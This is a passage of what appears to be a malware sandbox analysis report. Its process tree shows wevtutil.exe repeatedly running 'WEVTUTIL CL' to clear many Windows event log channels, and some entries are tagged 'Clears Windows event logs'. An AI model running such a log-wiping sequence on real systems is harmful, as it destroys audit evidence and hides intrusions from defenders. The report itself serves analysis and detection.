    WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:7120
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CloudStore/Debug"
    3⤵
    PID:11272
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CloudStore/Operational"
    3⤵
    PID:9816
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:11800
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:11884
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:6424
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Analytic"
    3⤵
    PID:11792
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Operational"
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Debug"
    3⤵
    PID:11748
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Operational"
    3⤵
    PID:11280
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Debug"
    3⤵
    PID:11492
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Operational"
    3⤵
    PID:11684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Debug"
    3⤵
    PID:12096
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Operational"
    3⤵
    PID:11428
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreApplication/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11512
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreApplication/Operational"
    3⤵
    PID:11936
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreApplication/Tracing"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
    3⤵
    PID:6276
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
    3⤵
    PID:11716
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreWindow/Analytic"
    3⤵
    PID:12116
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CoreWindow/Debug"
    3⤵
    PID:9152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crashdump/Operational"
    3⤵
    PID:9736
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:8252
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-BCRYPT/Analytic"
    3⤵
    PID:7636
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-CNG/Analytic"
    3⤵
    PID:8980
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
    3⤵
    PID:11812
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Debug"
    3⤵
    PID:11860
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Operational"
    3⤵
    PID:12188
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-DSSEnh/Analytic"
    3⤵
    PID:11300
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-NCrypt/Operational"
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:10588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-RSAEnh/Analytic"
    3⤵
    PID:12100
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:11920
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3652
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DAL-Provider/Analytic"
    3⤵
    PID:11544
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DAL-Provider/Operational"
    3⤵
    PID:11676
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DAMM/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:8660
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DDisplay/Analytic"
    3⤵
    PID:7344
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DDisplay/Logging"
    3⤵
    - Clears Windows event logs
    PID:11180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DLNA-Namespace/Analytic"
    3⤵
    PID:8464
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:11828
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DSC/Admin"
    3⤵
    PID:11520
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DSC/Analytic"
    3⤵
    PID:11468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DSC/Debug"
    3⤵
    PID:11484
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DSC/Operational"
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:7268
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:7452
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:8188
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
    3⤵
    - Clears Windows event logs
    PID:11144
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:6292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Data-Pdf/Debug"
    3⤵
    PID:7812
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/Admin"
    3⤵
    PID:9996
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
    3⤵
    PID:9472
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:8368
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:7788
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:12012
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deduplication/Diagnostic"
    3⤵
    PID:8892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deduplication/Operational"
    3⤵
    PID:9140
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deduplication/Performance"
    3⤵
    PID:9340
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deduplication/Scrubbing"
    3⤵
    PID:6608
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Defrag-Core/Debug"
    3⤵
    PID:9496
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:10076
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
    3⤵
    PID:12200
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceAssociationService/Performance"
    3⤵
    PID:11636
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceConfidence/Analytic"
    3⤵
    PID:12156
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceGuard/Operational"
    3⤵
    PID:12104
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceGuard/Verbose"
    3⤵
    PID:7396
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
    3⤵
    PID:7496
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
    3⤵
    PID:9952
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
    3⤵
    PID:12132
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Admin"
    3⤵
    PID:10848
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11776
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Debug"
    3⤵
    - Clears Windows event logs
    PID:7332
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Operational"
    3⤵
    PID:7840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:6604
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:10284
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUpdateAgent/Operational"
    3⤵
    PID:12180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:10288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Devices-Background/Operational"
    3⤵
    PID:12092
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:11728
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:7912
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:10268
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:9956
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
    3⤵
    - Clears Windows event logs
    PID:10340
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:11204
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:9076
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:8560
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    - Clears Windows event logs
    PID:6684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:7760
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:9440
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:9560
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:9116
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:8732
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:8384
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:8220
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:7892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:9060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8000
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    - Clears Windows event logs
    PID:2468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:10148
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:10020
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6700
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:9764
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:9644
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:6736
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:10388
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:9388
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:8652
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D12/Analytic"
    3⤵
    PID:8108
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D12/Logging"
    3⤵
    PID:7688
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D12/PerfTiming"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D9/Analytic"
    3⤵
    PID:6340
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3DShaderCache/Default"
    3⤵
    PID:10352
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectComposition/Diagnostic"
    3⤵
    PID:10152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectManipulation/Diagnostic"
    3⤵
    PID:9464
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:6928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:6564
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:10120
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:9928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dism-Api/Analytic"
    3⤵
    PID:10260
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dism-Api/ExternalAnalytic"
    3⤵
    PID:9120
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dism-Api/InternalAnalytic"
    3⤵
    PID:9284
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dism-Cli/Analytic"
    3⤵
    PID:7108
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:6640
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:9300
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:11740
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:10596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dot3MM/Diagnostic"
    3⤵
    PID:9916
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DucUpdateAgent/Operational"
    3⤵
    PID:10700
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dwm-API/Diagnostic"
    3⤵
    PID:8056
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dwm-Core/Diagnostic"
    3⤵
    PID:10936
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dwm-Dwm/Diagnostic"
    3⤵
    PID:11148
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dwm-Redir/Diagnostic"
    3⤵
    PID:11048
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dwm-Udwm/Diagnostic"
    3⤵
    PID:7324
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl-Admin"
    3⤵
    PID:9056
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl-Operational"
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Contention"
    3⤵
    PID:7528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:9348
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:7576
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Power"
    3⤵
    PID:7492
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    - Clears Windows event logs
    PID:7032
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EDP-Application-Learning/Admin"
    3⤵
    PID:7716
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EDP-Audit-Regular/Admin"
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EDP-Audit-TCB/Admin"
    3⤵
    PID:7992
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ESE/IODiagnose"
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ESE/Operational"
    3⤵
    - Clears Windows event logs
    PID:4840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:8520
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:10560
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapMethods-RasChap/Operational"
    3⤵
    PID:6732
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapMethods-RasTls/Operational"
    3⤵
    PID:7132
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapMethods-Sim/Operational"
    3⤵
    PID:10660
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapMethods-Ttls/Operational"
    3⤵
    PID:10928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:7664
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
    3⤵
    PID:9012
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/Trace"
    3⤵
    PID:9628
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
    3⤵
    PID:8756
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:9408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:7744
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:7388
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:9312
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:10380
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:7592
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:11040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Analytic"
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Operational"
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Analytic"
    3⤵
    PID:6796
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Debug"
    3⤵
    PID:9636
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
    3⤵
    PID:10792
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Debug"
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9540
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Debug"
    3⤵
    - Clears Windows event logs
    PID:6208
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/WHC"
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\wevtutil.exe
